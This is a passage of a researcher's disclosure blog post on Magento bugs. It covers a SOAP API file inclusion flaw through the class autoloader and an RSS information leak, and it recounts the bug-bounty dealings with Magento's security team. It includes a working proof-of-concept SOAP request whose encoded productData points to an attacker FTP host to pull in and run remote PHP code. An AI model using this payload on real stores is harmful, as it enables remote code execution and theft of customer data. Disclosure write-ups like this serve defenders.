(!property_exists($productData, 'stock_data')) { //Set default stock_data if not exist in product data $_stockData = array('use_config_manage_stock' => 0); $product->setStockData($_stockData); } This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists()function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there’s only one autoloader function registered, that is theVarien_Autoload::autoload() method: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function autoload($class) { if ($this->_collectClasses) { $this->_arrLoadedClasses[self::$_scope][] = $class; } if ($this->_isIncludePathDefined) { $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class; } else { $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class))); } $classFile.= '.php'; //echo $classFile;die(); return include $classFile; } In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the$productData parameter from the SOAP request, which after some replacementes and a “.php” string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code. There are some conditions which should be met to exploit this vulnerability: an API user account with privileges to create a catalog product is required; in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process; in order to include arbitrary files from remote locations the “allow_url_include” directive must be set to On; in case the “allow_url_include” directive is set to Off it might still be possible to include files from remote locations using thessh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging theexpect:// wrapper (which requires the Expect extension to be installed). NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243). Proof of Concept A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability: POST /magento/index.php/api/v2_soap HTTP/1.0 Host: localhost Content-Length: 804 Connection: close <?xml version=”1.0″ encoding=”UTF-8″?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ns1=”urn:Magento” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> <SOAP-ENV:Body> <ns1:catalogProductCreate> <sessionId xsi:type=”xsd:string”>VALID_SESSION</sessionId> <type xsi:type=”xsd:string”>simple</type> <set xsi:type=”xsd:string”>4</set> <sku xsi:type=”xsd:string”>test</sku> <productData xsi:type=”xsd:base64Binary”>ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData> <storeView xsi:nil=”true”/> </ns1:catalogProductCreate> </SOAP-ENV:Body> </SOAP-ENV:Envelope> The “productData” parameter has been encoded in base64 within the SOAP request, and the decoded string is the following: ftp://attacker:password@attacker_server.com/home/attacker/evil This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution. Responsible Disclosure Timeline As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable. The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following: We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report. On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000. I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015. • Information Disclosure in RSS Feed (CVE-2016-2212) After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered “Why don’t try to report this as well? Maybe I’m missing something out and I wrongly believe this isn’t a real security issue”. Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!! I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day: Hello Egidio, Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers. After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171″. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000. I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update:SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you? Conclusion Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progresses. However, what really disappoints me is that my vulnerabilities seem to be quite critical, specially considering they’re the only two classes of security bugs they’re willing to pay up to 10,000$ under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and underevaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never noticed their advisories with my name and the vulnerabilities I reported, and never claimed my bounties for such findings? This entry was posted on March 3, 2016 Sursa: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd